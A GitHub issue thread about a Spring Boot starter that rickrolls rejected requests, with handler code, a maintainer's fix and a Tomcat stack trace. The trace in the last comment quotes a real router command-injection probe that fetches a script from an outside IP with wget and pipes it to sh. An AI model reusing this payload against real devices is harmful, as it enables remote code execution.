
Can't rickroll when RequestRejectedException is thrown

Open tschuehly opened this issue 1 year ago • 4 comments

My WordPress guys can't formulate proper URLs: (image)

The request is rejected before the filter and the rickroll is not applied.

I've tried adding an ExceptionAdvice, but Spring routes to the /error endpoint before the Exception is caught:

    // Advice as posted (wrapping class name assumed). @ExceptionHandler methods are invoked
    // by DispatcherServlet, but RequestRejectedException is thrown by Spring Security's
    // FilterChainProxy before the request reaches DispatcherServlet, so this never runs.
    @ControllerAdvice
    class RequestRejectedAdvice {
        @ExceptionHandler(RequestRejectedException::class)
        @ResponseBody
        fun handleRequestRejected(e: RequestRejectedException, response: HttpServletResponse) {
            response.sendRedirect("https://www.youtube.com/watch?v=dQw4w9WgXcQ")
        }
    }

tschuehly avatar Jun 14 '24 15:06 tschuehly
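For the hook that does see this case, an added example (not the starter's own code; package and class names are assumptions): since Spring Security 5.4 you can expose a RequestRejectedHandler bean, which FilterChainProxy invokes when the HttpFirewall rejects a request, before the request ever reaches DispatcherServlet, so an @ExceptionHandler never runs.

```java
package example.rejected; // hypothetical package, not part of the starter

import java.io.IOException;

import jakarta.servlet.http.HttpServletRequest;
import jakarta.servlet.http.HttpServletResponse;

import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.security.web.firewall.RequestRejectedException;
import org.springframework.security.web.firewall.RequestRejectedHandler;

/**
 * Exposes a RequestRejectedHandler bean. Spring Security's WebSecurity looks up a
 * single bean of this type and installs it on FilterChainProxy, which calls it
 * whenever the HttpFirewall (StrictHttpFirewall by default) rejects a request.
 * The call happens inside the security filter, before DispatcherServlet, which is
 * why a @ControllerAdvice cannot intercept the exception but this handler can.
 */
@Configuration
public class RejectedRequestConfig {

    private static final Logger log = LoggerFactory.getLogger(RejectedRequestConfig.class);

    @Bean
    public RequestRejectedHandler requestRejectedHandler() {
        return (HttpServletRequest request, HttpServletResponse response,
                RequestRejectedException ex) -> {
            // Log at DEBUG: these are malformed probes, not application errors,
            // so they should not fill the logs at WARN/ERROR.
            log.debug("Firewall rejected {} {} from {}: {}", request.getMethod(),
                    request.getRequestURI(), request.getRemoteAddr(), ex.getMessage());
            // Answer without revealing why the request was rejected.
            // (Replace the redirect with response.sendError(400) if the rickroll is not wanted.)
            response.sendRedirect("https://www.youtube.com/watch?v=dQw4w9WgXcQ");
        };
    }
}
```

This only covers rejections made by Spring Security's firewall. A request line that Tomcat itself refuses to parse (an invalid character in the request target) is dropped before a servlet request object exists, so neither this handler nor any Filter is invoked for it.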

Thanks for the report! Will look into this.

TomCools avatar Jun 14 '24 17:06 TomCools

@tschuehly found the issue: a simple missing @Order annotation on the Filter. I do have some issues with my release setup, so it'll be for tomorrow morning.

TomCools avatar Jun 14 '24 19:06 TomCools

@tschuehly: This has been included in a new release: https://github.com/TomCools/rickroll-security-spring-boot-starter/releases/tag/v3.2.1.

I'll close this ticket once you've confirmed it works for you as well ;)

TomCools avatar Jun 15 '24 07:06 TomCools

Hey @TomCools the fix works!

It doesn't apply if Tomcat catches the request because of an invalid character. This one clogs my logs as well 😔

java.lang.IllegalArgumentException: Invalid character found in the request target [/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) ]. 
The valid characters are defined in RFC 7230 and RFC 3986
	at org.apache.coyote.http11.Http11InputBuffer.parseRequestLine(Http11InputBuffer.java:482) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
	at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:264) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
	at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:63) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
	at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:896) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
	at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1744) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
	at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:52) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
	at org.apache.tomcat.util.threads.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1191) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
	at org.apache.tomcat.util.threads.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:659) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
	at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) ~[tomcat-embed-core-10.1.16.jar:10.1.16]
	at java.base/java.lang.Thread.run(Unknown Source) ~[na:na]

tschuehly avatar Jun 30 '24 13:06 tschuehly